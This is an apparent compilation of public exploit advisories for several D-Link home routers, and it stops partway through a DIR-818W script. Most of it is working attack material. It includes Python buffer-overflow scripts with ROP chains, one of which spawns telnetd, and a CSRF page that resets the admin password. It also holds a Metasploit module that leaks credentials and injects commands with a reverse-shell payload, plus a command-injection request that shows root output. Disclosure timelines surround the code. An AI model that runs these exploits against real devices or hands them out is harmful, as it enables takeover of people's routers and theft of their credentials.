Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
## Details
HNAP buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
source: https://www.securityfocus.com/bid/59312/info
D-Link DIR-865L is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.
D-Link DIR-865L firmware version 1.03 is vulnerable; other versions may also be affected.
<html> <head> <title> D-LINK DIR-865L CSRF</title> <!-- Firmware Version: 1.03 Fri 02 Nov 2012 --> </head> <body> <form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" enctype="text/plain" method="post"> <input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?> <postxml> <module> <service>DEVICE.ACCOUNT</service> <device> <gw_name>DIR-865L</gw_name> <account> <seqno>1</seqno> <max>2</max> <count>1</count> <entry> <uid>USR-</uid> <name>Admin</name> <usrid/> <password>ISE</password> <group>0</group> <description/> </entry> </account> <group> <seqno/> <max/> <count>0</count> </group> <session> <captcha>0</captcha> <dummy/> <timeout>600</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> </device> </module> <module> <service>HTTP.WAN-1</service> <inf> <web>1337</web> <https_rport></https_rport> <stunnel>1</stunnel> <weballow> <hostv4ip/> </weballow> <inbfilter></inbfilter> </inf> </module> <module> <service>HTTP.WAN-2</service> <inf> <web>1337</web> <weballow></weballow> </inf> </module> <module> <service>INBFILTER</service> <acl> <inbfilter> <seqno>1</seqno> <max>24</max> <count>0</count> </inbfilter> </acl> <ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY> <SETCFG>ignore</SETCFG> </module> <module> <service>SHAREPORT</service> <FATLADY>ignore</FATLADY> <ACTIVATE>ignore</ACTIVATE> </module> </postxml>"> </form> <script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script> </body> </html>
# Exploit Title: D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Route Authentication Bypass
# CVE: CVE-2018-9032
# Date: 24-03-2018
# Exploit Author: Gem George
# Author Contact: https://www.linkedin.com/in/gemgrge
# Vulnerable Product: D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router http://www.dlink.co.in/products/?pid=628
# Firmware version: 1.02-2.06
# Hardware version: A1, B1
# Vendor Homepage: https://dlink.com
Vulnerability Details
======================
An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router potentially allows attackers to bypass SharePort Web Access Portal by directly accessing authenticated pages such as /category_view.php or /folder_view.php. This could potentially allow unauthorized remote access of media stored in SharePort and may perform write operation in the portal
How to exploit
===================
Directly call authenticated URLs to bypass authentication
Examples:
* http://[router_ip][port]/category_view.php
* http://[router_ip][port]/folder_view.php
POC
=========
* https://youtu.be/Wmm4p8znS3s
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DIR-850L (Un)authenticated OS Command Exec',
'Description' => %q{
This module leverages an unauthenticated credential disclosure
vulnerability to then execute arbitrary commands on DIR-850L routers
as an authenticated user. Unable to use Meterpreter payloads.
},
'Author' => [
'Mumbai', # https://github.com/realoriginal (module)
'Zdenda' # vuln discovery
],
'References' => [
['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
],
'DisclosureDate' => 'Aug 9 2017',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
end
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers['Server']
auth = res.headers['Server']
if auth =~ /DIR-850L/
if auth =~ /WEBACCESS\/1\.0/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
# some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
# should write an auxiliary module to-do -> WRITE AUXILIARY
def retrieve_creds
begin
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
xml << "<postxml>\r\n"
xml << "<module>\r\n"
xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
xml << "</module>\r\n"
xml << "</postxml>"
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'encode_params' => false,
'headers' => {
'Accept-Encoding' => 'gzip, deflate',
'Accept' => '*/*'
},
'ctype' => 'text/xml',
'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
'data' => xml,
})
if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
parse = res.get_xml_document
username = parse.at('//name').text
password = parse.at('//password').text
vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
print_good("#{peer} - Downloaded credentials to #{loot}")
return username, password
else
fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def retrieve_uid
begin
res = send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'GET',
})
parse = res.get_json_document
uid = parse['uid']
challenge = parse['challenge']
return uid, challenge
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def login(username, password)
uid, challenge = retrieve_uid
begin
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'POST',
'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}"
})
return uid
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def execute_command(cmd, opts)
uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
payload << "<postxml>\r\n"
payload << "<module>\r\n"
payload << " <service>DEVICE.TIME</service>\r\n"
payload << " <device>\r\n"
payload << " <time>\r\n"
payload << " <ntp>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
payload << " </ntp>\r\n"
payload << " <ntp6>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " </ntp6>\r\n"
payload << " <timezone>20</timezone>\r\n"
payload << " <time/>\r\n"
payload << " <date/>\r\n"
payload << " <dst>0</dst>\r\n"
payload << " <dstmanual/>\r\n"
payload << " <dstoffset/>\r\n"
payload << " </time>\r\n"
payload << " </device>\r\n"
payload << "</module>\r\n"
payload << "</postxml>"
begin
# save configuration
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'ctype' => 'text/xml',
'data' => payload,
'cookie' => "uid=#{uid}"
})
# execute configuration
res = send_request_cgi({
'uri' => '/pigwidgeon.cgi',
'method' => 'POST',
'data' => 'ACTIONS=SETCFG,ACTIVATE',
'cookie' => "uid=#{uid}"
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
end
#
# Information Retrieval, obtains creds and logs in
#
@username, @password = retrieve_creds
execute_cmdstager(
:flavor => :wget,
:linemax => 200
)
end
end
# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
# Google Dork: NA
# Date: 30/01/2023
# Exploit Author: Françoa Taffarel
# Vendor Homepage:
https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Software Link:
https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Version: DIR846enFW100A53DBR-Retail
# Tested on: D-LINK DIR-846
# CVE : CVE-2022-46552
D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote
command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist
parameter. This vulnerability is exploited via a crafted POST request.
### Malicious POST Request
```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;
PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
```
### Response
```
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68
{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
```
### Data from RCE Request
```
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;
PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
```
### Response
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35
uid=0(root) gid=0(root)
```
## Advisory Information
Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal
issue exists which can be exploited
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed
issues as per the email communication. The vendor had also released the information on their security advisory
pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly
accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing
this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in
authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited
by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack
directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would
require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of
authentication as low privileged user atleast to exploit directory traversal.
## Details
Buffer overflow in auth
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "GET /dws/api/Login?test="
buf+="B"*251
buf+="CCCC" #s0
buf+="FFFF" #s1
buf+="FFFF" #s2
buf+="FFFF" #s3
buf+="XXXX" #s4
buf+="HHHH" #s5
buf+="IIII" #s6
buf+="JJJJ" #s7
buf+="LLLL"
buf+="\x2a\xbc\x8c\xa0" # retn address
buf+="C"*24 #
buf+="sh;;"
buf+="K"*20
buf+="\x2a\xc0\xd2\xa0" #s1
buf+="\x2a\xc0\xd2\xa0" #s1
buf
+="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCC"
buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml
+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in HNAP
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "POST /HNAP1/ HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: uid:1111;\r\n"
buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Directory traversal
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
Useful to do directory traversal attack which is possible in html_response_page variable below which prints the
conf file, but theoretically any file, most likely only after login accessible
'''
payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l
og_pass=test3&graph_code=63778&session_id=test5&test=test"
buf = "POST /apply.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
Buffer overflow in ping
------------------------------------------------------------------------------------------------------------------
----
import socket
import struct
'''
282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_
ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test"
buf = "POST /ping_response.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
------------------------------------------------------------------------------------------------------------------
----
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
## Advisory Information
Title: DIR-818W Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-818W -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-818W firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
'''
2096 after id GET param, you can control the RA
'''
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #S0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="\x2A\xB1\x4D\xF0" #JUNK S3
buf+="\x2A\xB1\x4D\xF0" #JUNK S4
